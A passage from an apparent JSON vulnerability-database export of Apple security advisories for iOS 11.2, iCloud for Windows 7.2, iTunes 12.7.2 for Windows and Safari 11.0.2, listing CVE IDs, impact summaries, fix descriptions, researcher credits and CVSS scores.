validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Incorrect certificate is used for encryption\n\nDescription: An S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate.\n\nCVE-2017-13874: Nicolas Devillard\n\nEntry updated April 9, 2018\n\n**Mail Drafts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. 
The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)\n\nEntry added December 21, 2017\n\n**ReplayKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A user may not have control over their screen broadcast\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13888: Dan Niemeyer of Microsoft, Peter Pau (ArcanaArt.com)\n\nEntry added June 21, 2018, updated September 8, 2020\n\n**SafariViewController**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-13891: Janne Raiskila (@raiskila)\n\nEntry added June 21, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security 
working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 13, 2017, updated May 4, 2018\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation \nReleased for iPhone 7 and later 
and iPad Pro 9.7-inch (early 2016) and later in [iOS 11.1](<https://support.apple.com/kb/HT208222>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-09-08T03:53:28", "title": "About the security content of iOS 11.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2411", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7152", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13888", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", 
"CVE-2017-13904", "CVE-2017-13891", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-13847", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13874", "CVE-2017-13867", "CVE-2017-13879", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "modified": "2020-09-08T03:53:28", "id": "APPLE:HT208334", "href": "https://support.apple.com/kb/HT208334", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:35", "description": "# About the security content of iCloud for Windows 7.2\n\nThis document describes the security content of iCloud for Windows 7.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.2\n\nReleased December 13, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. 
\n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. 
This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: January 25, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-13T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 7.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13864", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7165", "CVE-2017-7172"], "modified": "2017-12-13T00:00:00", "id": "APPLE:D5B2B0A52189C378A357D40438F75CF8", "href": "https://support.apple.com/kb/HT208328", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:47", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.2\n\nReleased December 13, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and 
later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-25T06:02:26", "title": "About the security content of iCloud for Windows 7.2 - Apple Support", "type": "apple", 
"bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13870", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2018-01-25T06:02:26", "id": "APPLE:HT208328", "href": "https://support.apple.com/kb/HT208328", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:38", "description": "# About the security content of iTunes 12.7.2 for Windows\n\nThis document describes the security content of iTunes 12.7.2 for Windows.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.2 for Windows\n\nReleased December 6, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**ICU**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and 
later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later \n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. 
Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "apple", "title": "About the security content of iTunes 12.7.2 for Windows", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13864", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-15422", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7165", "CVE-2017-7172"], "modified": "2017-12-06T00:00:00", "id": "APPLE:B3402276360A8C507F94E26E15D465F4", "href": "https://support.apple.com/kb/HT208326", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:45", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or 
confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.2 for Windows\n\nReleased December 6, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**ICU**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: 
Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later \n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. 
This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T05:09:28", "title": "About the security content of iTunes 12.7.2 for Windows - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-15422", "CVE-2017-13870", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2018-10-18T05:09:28", "id": "APPLE:HT208326", "href": "https://support.apple.com/kb/HT208326", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:24", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.0.2\n\nReleased December 6, 2017\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a 
